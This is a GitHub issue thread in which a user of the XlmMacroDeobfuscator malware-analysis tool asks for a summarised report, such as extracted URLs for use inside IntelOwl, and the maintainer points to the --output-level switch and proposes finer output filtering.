Open 0ssigeno opened 3 years ago
DissectMalware
commented
3 years ago Good idea.
Did you used --output-level switch?
Currently, it is only suppress uninteresting XLM macros
However, I can extend this to also remove uninteresting defined names ...
0ssigeno
commented
3 years ago I have to be honest, I did not test the --output-level, and it kinda does what I was looking for. I'm sorry to have bothered without having tested each switch.
DissectMalware
commented
3 years ago No worries. But still I think there is a room to better control the output. Currently, only macros can be filtered using this switch. May it is also a good idea to filter defined name, memory and file dumps. So, I will leave this issue open for improving this part of the project. Feel free to share your ideas on how we can improve this part.
Hi, I have inserted XlmMacroDeobfuscator inside IntelOwl (https://github.com/intelowlproject/IntelOwl/pull/196) to have a better understanding of the malware campaigns that are running these days in Italy. To have a report, i'm abusing the json format, but the the entire json is quite big and hard to read if you don't know what you are looking for. Would be a good idea to have a summary of what have been found? My personal use case would be find urls, allowing to easily find the document requests and the next payload to analyse. Don't get me wrong, is easy to make a regex to find the urls inside the report myself, but inside IntelOwl we decided to touch the tool result the least possible.